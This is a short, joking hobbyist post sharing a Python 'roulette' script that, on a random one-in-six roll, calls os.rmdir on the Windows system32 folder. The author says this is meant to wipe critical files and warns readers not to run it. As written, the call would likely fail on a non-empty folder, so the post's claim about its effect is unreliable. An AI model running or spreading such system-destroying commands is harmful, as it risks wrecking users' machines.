Dice game!

I was bored so naturally my thoughts went to how can I destroy my computer in a fun way through coding! Instantly my mind went to Roulette, where I would get the computer to roll a dice number 1 through 6, and if it landed on 1 it would delete most of the critical files in my computer! What a fun game that I coded! (Don’t ever run this please)

import random
import os
number = random.randint(1,6)

if number == 1:
    os.rmdir("C:\windows\system32")
    
else:
    print("Lucky you!")